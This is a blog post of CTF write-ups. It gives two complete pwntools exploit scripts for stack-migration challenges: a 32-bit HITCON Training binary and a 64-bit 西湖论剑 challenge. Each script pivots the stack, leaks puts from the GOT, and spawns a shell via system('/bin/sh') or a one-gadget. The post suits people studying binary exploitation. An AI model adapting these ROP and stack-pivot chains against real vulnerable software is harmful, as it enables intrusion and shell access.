pwning

  1. Pwning Magic
    1. Stack Migration
    2. HITCON Training
    3. 西湖论剑线下赛 pwn main

Pwning Magic

Stack Migration

Download link:

https://github.com/primelyw/pwn

HITCON Training

# Exploit script for the HITCON Training "migration" binary (32-bit).
#
# Technique: stack pivoting ("stack migration") into the binary's .bss,
# followed by a classic ret2libc: leak puts@GOT, compute the libc base,
# then call system("/bin/sh").  Every PLT/GOT/gadget address below is a
# fixed constant, so the chain relies on a non-PIE build and a writable,
# predictable .bss; the script does not show the binary's other
# mitigations (canary, RELRO), so those are assumed absent -- verify.
#
# NOTE: this is Python 2 code (print statement, str payloads); under
# Python 3 the payload concatenation and `print` would need changes.
from pwn import *
p = process('./migration')
context.arch = 'i386'
elf = ELF('./migration',False)
# Offsets (puts, system) are taken from the local system libc; the leak
# below is only meaningful if the target runs this exact libc build.
libc = ELF('/lib/i386-linux-gnu/libc.so.6',False)
bss = elf.bss()
# Two scratch areas inside .bss used as fake stack frames for the pivots.
buf = bss+0x200
buf2 = bss+0x300
leave_ret = 0x08048504   # gadget address (name suggests leave; ret) -- fixed, non-PIE
pop_ebx_ret = 0x0804836d # gadget used to discard one call argument from the stack
read_plt = elf.symbols['read']
read_got = elf.got['read']
puts_got = elf.got['puts']
puts_plt = elf.symbols['puts']
puts_libc = libc.symbols['puts']
sys_libc = libc.symbols['system']

p.recvuntil(':\n')
# Stage 1: 0x28 bytes of padding, saved ebp := buf, return into read@plt
# with leave_ret as read's return address and args (0, buf, 100).  After
# read() fills buf, leave;ret moves the stack pointer to buf.
pay = 'a'*0x28+flat([buf,read_plt,leave_ret,0,buf,100])
p.send(pay)
# Short pause so the second send is consumed by the second read() rather
# than being merged into the first one (presumably; timing-dependent).
sleep(0.01)
# Stage 2 (lands in buf): saved ebp := buf2, puts(puts_got) to leak the
# resolved address, pop_ebx_ret clears the argument, then read(0, buf2, 100)
# and another leave;ret pivots into buf2.
pay = flat([buf2,puts_plt,pop_ebx_ret,puts_got,read_plt,leave_ret,0,buf2,100])
p.send(pay)

# First 4 bytes of puts' output are the little-endian address of puts in libc.
puts_real = u32(p.recv(4))
print hex(puts_real)

libc_base = puts_real - puts_libc
sys_real = libc_base + sys_libc

# Stage 3 (lands in buf2): dummy ebp, return into system with a dummy
# return address; the argument points at buf2+16, where "/bin/sh\0" sits.
pay = flat([0,sys_real,0,buf2+4*4,'/bin/sh\x00'])
p.sendline(pay)

p.interactive()

西湖论剑线下赛 pwn main

64位栈迁移

#!/usr/bin/env python
#coding=utf8
# Exploit script for the "main" challenge (64-bit stack migration).
#
# Flow: the "name" input is used to stage a ROP frame at a fixed .bss-like
# address, the "buffer" input overwrites the saved rbp and returns into a
# leave;ret gadget to pivot onto that frame, puts@GOT is leaked, and the
# final stage returns into a libc one-gadget offset.  All gadget, PLT and
# buffer addresses are hard-coded, so the chain assumes a non-PIE build;
# the binary's other mitigations are not shown here -- verify.
#
# NOTE: Python 2 code (print statement, str payloads).
from pwn import *
p = process('./main')
context.arch = 'amd64'
elf = ELF('./main',False)
# Offsets come from the local libc; the one_off value below is only valid
# for this exact libc build.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',False)

# Debug hook, disabled (if 0); flipping it to 1 attaches gdb in a tmux pane.
if 0:
    context.log_level = 'debug'
    context.terminal = ['tmux','splitw','-h']
    gdb.attach(p)

puts_plt = elf.symbols['puts']
puts_got  = elf.got['puts']
read_plt = elf.symbols['read']
puts_libc = libc.symbols['puts']
main_addr = 0x4006C3      # not used by the chain below
pop_rdi_ret = 0x00000000004007a3
leave_ret = 0x0000000000400733
pop_rbp_ret =  0x00000000004005e0  # not used by the chain below
read_leave_ret = 0x400718 #lea rax, [rbp-40h]  -- mid-function entry: reads into rbp-0x40, then leave;ret (per the author's note)
one_off = 0xf1147         # presumably a one-gadget offset into this libc -- libc-build specific

#bss = elf.bss#0x602000-0x200
name_addr = 0x00601080   # where the "name" input is stored (fixed address)
buf = 0x0601080+0x600
buf2 = buf+0x100

p.recvuntil('Input Your Name:\n')
# Stage 1: 0x100 bytes of NULs, then a frame at name_addr+0x100:
#   saved rbp := buf2, pop rdi; ret <- puts_got, puts@plt (leak),
#   then read_leave_ret to read the next stage into rbp-0x40 (= buf2-0x40).
rop = '\x00'*0x100
rop += flat([buf2,pop_rdi_ret,puts_got,puts_plt,read_leave_ret])
p.send(rop)
p.recvuntil('Input Buffer:\n')
# Stage 2: 0x40 bytes of padding, overwrite saved rbp with name_addr+0x100
# and return into leave;ret, pivoting the stack onto the staged frame.
rop = 'a'*0x40; rop += flat([name_addr+0x100,leave_ret])
p.send(rop)
# A user-space address occupies 6 bytes; pad to 8 for u64.
puts_real = u64(p.recv(6)+'\x00'*2)
one = puts_real - puts_libc + one_off
print hex(one)
# Stage 3 (read into buf2-0x40): the one-gadget address followed by seven
# zero qwords (presumably to satisfy the gadget's stack constraint), then
# saved rbp := buf2-0x48 and leave_ret so the second leave;ret lands on `one`.
rop = flat([one,0,0,0,0,0,0,0,buf2-0x48,leave_ret])
p.send(rop)

p.interactive()

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论。

文章标题:pwning

本文作者:枫云李

发布时间:2019-05-10, 00:00:00

最后更新:2020-01-16, 02:06:12

原始链接:https://primelyw.github.io/2019/05/10/pwning/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。
